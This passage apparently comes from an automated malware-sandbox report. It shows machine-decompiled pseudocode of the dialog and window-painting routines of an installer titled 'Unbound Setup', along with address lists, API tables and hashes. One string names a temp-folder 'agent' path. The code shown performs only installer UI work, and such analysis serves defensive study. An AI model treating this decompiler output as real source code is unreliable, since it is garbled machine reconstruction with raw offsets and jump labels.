							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4cc - _t134;
							if( *0x42f4cc == _t134) {
								_push( *0x42a894);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429860);
							}
							E00404229();
							E00406166(0x42a898, E00403D01());
							E00406188(0x42a898, _t126, _t131,  &(0x42a898[lstrlenA(0x42a898)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a898);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)), _t134);
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ebf8);
									 *0x42a070 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f420,  *_t131 +  *0x42ec00 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x42ebf8 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004041F4(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ebf8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									E00401389( *((intOrPtr*)(_t131 + 0xc)), _t134);
									__eflags =  *0x42ebec - _t134; // 0x1
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ebf8, 8);
									E00404240(0x405);
									goto L58;
								}
								__eflags =  *0x42f4cc - _t134;
								if( *0x42f4cc != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4c0 - _t134;
								if( *0x42f4c0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ebf8);
						 *0x42f428 = _t134;
						EndDialog(_t126,  *0x429c68);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)), 0);
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ebf8, 0x40f, 0, 1);
						__eflags =  *0x42ebec - _t134; // 0x1
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a878, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a878,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E0040425B(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ebf8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4cc - _t134;
										if( *0x42f4cc == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c68 = 1;
											L21:
											_push(0x78);
											L22:
											E004041CD();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c68 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ebf8);
						 *0x42ebf8 = _a12;
						L58:
						if( *0x42b898 == _t134) {
							_t143 =  *0x42ebf8 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x42b898 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                                                                                                                                    0x00403d29
                                                                                                                                    0x00403d32
                                                                                                                                    0x00403e73
                                                                                                                                    0x00403e77
                                                                                                                                    0x00403e7b
                                                                                                                                    0x00403e7d
                                                                                                                                    0x00403e82
                                                                                                                                    0x00403e8d
                                                                                                                                    0x00403e98
                                                                                                                                    0x00403e9d
                                                                                                                                    0x00403e9f
                                                                                                                                    0x00403ea1
                                                                                                                                    0x00403ea4
                                                                                                                                    0x00403ea9
                                                                                                                                    0x00403eb7
                                                                                                                                    0x00403ec4
                                                                                                                                    0x00403ecb
                                                                                                                                    0x00403ecb
                                                                                                                                    0x00403ecc
                                                                                                                                    0x00403ecc
                                                                                                                                    0x00403ed1
                                                                                                                                    0x00403ed7
                                                                                                                                    0x00403ede
                                                                                                                                    0x00403ee4
                                                                                                                                    0x00403ee6
                                                                                                                                    0x00403f26
                                                                                                                                    0x00403f2b
                                                                                                                                    0x00403f30
                                                                                                                                    0x00403f30
                                                                                                                                    0x00403f35
                                                                                                                                    0x00403f3e
                                                                                                                                    0x00403f40
                                                                                                                                    0x00403f45
                                                                                                                                    0x00403f4b
                                                                                                                                    0x00403f4f
                                                                                                                                    0x00403f4f
                                                                                                                                    0x00403f54
                                                                                                                                    0x00403f5a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403f65
                                                                                                                                    0x00403f6b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403f74
                                                                                                                                    0x00403f7c
                                                                                                                                    0x00403f81
                                                                                                                                    0x00403f84
                                                                                                                                    0x00403f8a
                                                                                                                                    0x00403f8f
                                                                                                                                    0x00403f92
                                                                                                                                    0x00403f98
                                                                                                                                    0x00403f9d
                                                                                                                                    0x00403fa0
                                                                                                                                    0x00403fa6
                                                                                                                                    0x00403fae
                                                                                                                                    0x00403fb4
                                                                                                                                    0x00403fba
                                                                                                                                    0x00403fbe
                                                                                                                                    0x00403fc5
                                                                                                                                    0x00403fc5
                                                                                                                                    0x00403fc5
                                                                                                                                    0x00403fcf
                                                                                                                                    0x00403fe1
                                                                                                                                    0x00403fed
                                                                                                                                    0x00403ff2
                                                                                                                                    0x00403ffc
                                                                                                                                    0x00404002
                                                                                                                                    0x00404004
                                                                                                                                    0x00404009
                                                                                                                                    0x00404006
                                                                                                                                    0x00404006
                                                                                                                                    0x00404006
                                                                                                                                    0x00404019
                                                                                                                                    0x00404031
                                                                                                                                    0x00404033
                                                                                                                                    0x00404039
                                                                                                                                    0x0040404e
                                                                                                                                    0x0040403b
                                                                                                                                    0x00404044
                                                                                                                                    0x00404046
                                                                                                                                    0x00404046
                                                                                                                                    0x00404054
                                                                                                                                    0x00404065
                                                                                                                                    0x00404076
                                                                                                                                    0x0040407d
                                                                                                                                    0x00404087
                                                                                                                                    0x0040408c
                                                                                                                                    0x0040408e
                                                                                                                                    0x00000000
                                                                                                                                    0x00404094
                                                                                                                                    0x00404094
                                                                                                                                    0x00404096
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040409c
                                                                                                                                    0x004040a0
                                                                                                                                    0x004040c5
                                                                                                                                    0x004040cb
                                                                                                                                    0x004040d1
                                                                                                                                    0x004040d3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004040f9
                                                                                                                                    0x004040ff
                                                                                                                                    0x00404101
                                                                                                                                    0x00404106
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040410c
                                                                                                                                    0x0040410f
                                                                                                                                    0x00404112
                                                                                                                                    0x00404129
                                                                                                                                    0x00404135
                                                                                                                                    0x0040414e
                                                                                                                                    0x00404158
                                                                                                                                    0x0040415d
                                                                                                                                    0x00404163
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040416d
                                                                                                                                    0x00404178
                                                                                                                                    0x00000000
                                                                                                                                    0x00404178
                                                                                                                                    0x004040a2
                                                                                                                                    0x004040a8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004040ae
                                                                                                                                    0x004040b4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004040ba
                                                                                                                                    0x0040408e
                                                                                                                                    0x00404185
                                                                                                                                    0x00404191
                                                                                                                                    0x00404198
                                                                                                                                    0x00000000
                                                                                                                                    0x00403ee8
                                                                                                                                    0x00403ee8
                                                                                                                                    0x00403eeb
                                                                                                                                    0x00403f1e
                                                                                                                                    0x00403f1e
                                                                                                                                    0x00403f20
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403f20
                                                                                                                                    0x00403ef1
                                                                                                                                    0x00403ef6
                                                                                                                                    0x00403ef8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403f08
                                                                                                                                    0x00403f10
                                                                                                                                    0x00000000
                                                                                                                                    0x00403f16
                                                                                                                                    0x00403d44
                                                                                                                                    0x00403d44
                                                                                                                                    0x00403d48
                                                                                                                                    0x00403d4d
                                                                                                                                    0x00403d5c
                                                                                                                                    0x00403d5c
                                                                                                                                    0x00403d65
                                                                                                                                    0x00403d6e
                                                                                                                                    0x00403d79
                                                                                                                                    0x00403d79
                                                                                                                                    0x00403d85
                                                                                                                                    0x00403da1
                                                                                                                                    0x00403da4
                                                                                                                                    0x00403db7
                                                                                                                                    0x00403dbd
                                                                                                                                    0x00403e60
                                                                                                                                    0x00000000
                                                                                                                                    0x00403e69
                                                                                                                                    0x00403dc3
                                                                                                                                    0x00403dd0
                                                                                                                                    0x00403dd2
                                                                                                                                    0x00403dd4
                                                                                                                                    0x00403df3
                                                                                                                                    0x00403df3
                                                                                                                                    0x00403df6
                                                                                                                                    0x00403dfb
                                                                                                                                    0x00403dfe
                                                                                                                                    0x00403e0e
                                                                                                                                    0x00403e0f
                                                                                                                                    0x00403e11
                                                                                                                                    0x00403e47
                                                                                                                                    0x00403e5a
                                                                                                                                    0x00000000
                                                                                                                                    0x00403e5a
                                                                                                                                    0x00403e13
                                                                                                                                    0x00403e19
                                                                                                                                    0x00403e32
                                                                                                                                    0x00403e37
                                                                                                                                    0x00403e39
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403e3b
                                                                                                                                    0x00403e27
                                                                                                                                    0x00403e27
                                                                                                                                    0x00403e29
                                                                                                                                    0x00403e29
                                                                                                                                    0x00000000
                                                                                                                                    0x00403e29
                                                                                                                                    0x00403e1c
                                                                                                                                    0x00403e21
                                                                                                                                    0x00000000
                                                                                                                                    0x00403e21
                                                                                                                                    0x00403e00
                                                                                                                                    0x00403e06
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403e08
                                                                                                                                    0x00000000
                                                                                                                                    0x00403e08
                                                                                                                                    0x00403df8
                                                                                                                                    0x00000000
                                                                                                                                    0x00403df8
                                                                                                                                    0x00403dde
                                                                                                                                    0x00403de5
                                                                                                                                    0x00403deb
                                                                                                                                    0x00403ded
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403ded
                                                                                                                                    0x00403da9
                                                                                                                                    0x00000000
                                                                                                                                    0x00403d87
                                                                                                                                    0x00403d8d
                                                                                                                                    0x00403d97
                                                                                                                                    0x0040419e
                                                                                                                                    0x004041a4
                                                                                                                                    0x004041a6
                                                                                                                                    0x004041ac
                                                                                                                                    0x004041b1
                                                                                                                                    0x004041b7
                                                                                                                                    0x004041b7
                                                                                                                                    0x004041ac
                                                                                                                                    0x004041c1
                                                                                                                                    0x00000000
                                                                                                                                    0x004041c1
                                                                                                                                    0x00403d85

                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5C
                                                                                                                                    • ShowWindow.USER32(?), ref: 00403D79
                                                                                                                                    • DestroyWindow.USER32 ref: 00403D8D
                                                                                                                                    • SetWindowLongA.USER32 ref: 00403DA9
                                                                                                                                    • GetDlgItem.USER32 ref: 00403DCA
                                                                                                                                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403DDE
                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403DE5
                                                                                                                                    • GetDlgItem.USER32 ref: 00403E93
                                                                                                                                    • GetDlgItem.USER32 ref: 00403E9D
                                                                                                                                    • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403EB7
                                                                                                                                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403F08
                                                                                                                                    • GetDlgItem.USER32 ref: 00403FAE
                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403FCF
                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00403FE1
                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00403FFC
                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404012
                                                                                                                                    • EnableMenuItem.USER32 ref: 00404019
                                                                                                                                    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00404031
                                                                                                                                    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00404044
                                                                                                                                    • lstrlenA.KERNEL32(0042A898,?,0042A898,00000000), ref: 0040406E
                                                                                                                                    • SetWindowTextA.USER32(?,0042A898), ref: 0040407D
                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 004041B1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 184305955-0
                                                                                                                                    • Opcode ID: c7c6e4d3dd8260ed78c6c5d463d2d5f6b7f322b843d7e68da7b759b855b3d578
                                                                                                                                    • Instruction ID: f1583ae769777d8160d41959bcba43e0d90a98f60c39713831340626624adfa9
                                                                                                                                    • Opcode Fuzzy Hash: c7c6e4d3dd8260ed78c6c5d463d2d5f6b7f322b843d7e68da7b759b855b3d578
                                                                                                                                    • Instruction Fuzzy Hash: 20C1D371600205ABDB216F62ED89E2B3ABDFB94305F40053EF651B51F1CB799882DB2D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040435F, Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202windowstringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E0040435F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x429864 =  *0x429864 + 1;
								__eflags =  *0x429864;
							}
							L25:
							_t110 = _a16;
							L26:
							return E0040425B(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x42e3c0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									_push(1);
									E00404603(_a4, _v8);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f428, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f428, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x429864; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t112 =  *0x42a070 + 0x14;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E00404216(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E004045DF();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x42ebfc; // 0x671d5f
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x42f478;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E0040432A;
					E004041F4(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E004041F4(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E00404216( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E00404229(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t86 =  *( *0x42f434 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x429864 = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x429864 = 0;
					return 0;
				}
			}



















                                                                                                                                    0x0040436f
                                                                                                                                    0x00404481
                                                                                                                                    0x00404494
                                                                                                                                    0x004044f0
                                                                                                                                    0x004044f0
                                                                                                                                    0x004044f4
                                                                                                                                    0x004045ba
                                                                                                                                    0x004045c1
                                                                                                                                    0x004045c3
                                                                                                                                    0x004045c3
                                                                                                                                    0x004045c3
                                                                                                                                    0x004045c9
                                                                                                                                    0x004045c9
                                                                                                                                    0x004045cc
                                                                                                                                    0x00000000
                                                                                                                                    0x004045d3
                                                                                                                                    0x00404502
                                                                                                                                    0x00404504
                                                                                                                                    0x00404507
                                                                                                                                    0x0040450e
                                                                                                                                    0x00404510
                                                                                                                                    0x00404517
                                                                                                                                    0x00404519
                                                                                                                                    0x0040451c
                                                                                                                                    0x0040451f
                                                                                                                                    0x00404524
                                                                                                                                    0x0040452a
                                                                                                                                    0x0040452d
                                                                                                                                    0x00404534
                                                                                                                                    0x00404542
                                                                                                                                    0x0040455a
                                                                                                                                    0x0040455c
                                                                                                                                    0x00404564
                                                                                                                                    0x00404573
                                                                                                                                    0x00404575
                                                                                                                                    0x00404575
                                                                                                                                    0x00404534
                                                                                                                                    0x00404517
                                                                                                                                    0x00404578
                                                                                                                                    0x0040457f
                                                                                                                                    0x00000000
                                                                                                                                    0x00404581
                                                                                                                                    0x00404581
                                                                                                                                    0x00404588
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040458a
                                                                                                                                    0x0040458e
                                                                                                                                    0x0040459f
                                                                                                                                    0x0040459f
                                                                                                                                    0x004045a1
                                                                                                                                    0x004045a5
                                                                                                                                    0x004045b3
                                                                                                                                    0x004045b3
                                                                                                                                    0x00000000
                                                                                                                                    0x004045b7
                                                                                                                                    0x0040457f
                                                                                                                                    0x0040449c
                                                                                                                                    0x0040449f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004044a7
                                                                                                                                    0x004044ad
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004044b9
                                                                                                                                    0x004044bc
                                                                                                                                    0x004044bf
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004044e2
                                                                                                                                    0x004044e2
                                                                                                                                    0x004044e4
                                                                                                                                    0x004044e6
                                                                                                                                    0x004044eb
                                                                                                                                    0x00000000
                                                                                                                                    0x00404375
                                                                                                                                    0x00404375
                                                                                                                                    0x00404378
                                                                                                                                    0x0040437d
                                                                                                                                    0x0040437f
                                                                                                                                    0x0040438e
                                                                                                                                    0x0040438e
                                                                                                                                    0x00404395
                                                                                                                                    0x00404398
                                                                                                                                    0x0040439a
                                                                                                                                    0x0040439f
                                                                                                                                    0x004043a8
                                                                                                                                    0x004043ae
                                                                                                                                    0x004043ba
                                                                                                                                    0x004043bd
                                                                                                                                    0x004043c6
                                                                                                                                    0x004043cb
                                                                                                                                    0x004043ce
                                                                                                                                    0x004043d3
                                                                                                                                    0x004043ea
                                                                                                                                    0x004043f1
                                                                                                                                    0x00404404
                                                                                                                                    0x00404407
                                                                                                                                    0x0040441c
                                                                                                                                    0x00404423
                                                                                                                                    0x00404428
                                                                                                                                    0x0040442d
                                                                                                                                    0x0040442d
                                                                                                                                    0x0040443c
                                                                                                                                    0x0040444b
                                                                                                                                    0x0040445d
                                                                                                                                    0x00404462
                                                                                                                                    0x00404472
                                                                                                                                    0x00404474
                                                                                                                                    0x00000000
                                                                                                                                    0x0040447a

                                                                                                                                    APIs
                                                                                                                                    • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004043EA
                                                                                                                                    • GetDlgItem.USER32 ref: 004043FE
                                                                                                                                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040441C
                                                                                                                                    • GetSysColor.USER32(?), ref: 0040442D
                                                                                                                                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040443C
                                                                                                                                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040444B
                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040444E
                                                                                                                                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040445D
                                                                                                                                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404472
                                                                                                                                    • GetDlgItem.USER32 ref: 004044D4
                                                                                                                                    • SendMessageA.USER32(00000000), ref: 004044D7
                                                                                                                                    • GetDlgItem.USER32 ref: 00404502
                                                                                                                                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404542
                                                                                                                                    • LoadCursorA.USER32 ref: 00404551
                                                                                                                                    • SetCursor.USER32(00000000), ref: 0040455A
                                                                                                                                    • LoadCursorA.USER32 ref: 00404570
                                                                                                                                    • SetCursor.USER32(00000000), ref: 00404573
                                                                                                                                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040459F
                                                                                                                                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 004045B3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                    • String ID: *C@$C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent$N
                                                                                                                                    • API String ID: 3103080414-171159700
                                                                                                                                    • Opcode ID: 0d3c02828e62e51ff56bf2943b0875dd3b902087131927a6b6dbeb2ed3138fdb
                                                                                                                                    • Instruction ID: fd893e278ef90fe5302b154ae5e2864ac3785098f99c53dfadd838e99d83cf4e
                                                                                                                                    • Opcode Fuzzy Hash: 0d3c02828e62e51ff56bf2943b0875dd3b902087131927a6b6dbeb2ed3138fdb
                                                                                                                                    • Instruction Fuzzy Hash: 5C61A2B1A00209BFEB10AF61DD45F6A3BA9FB84714F00453AFB057A1D1C7B8A951CF98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f434;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Unbound Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f428;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                                                                                    0x0040100a
                                                                                                                                    0x00401039
                                                                                                                                    0x00401047
                                                                                                                                    0x0040104d
                                                                                                                                    0x00401051
                                                                                                                                    0x0040105b
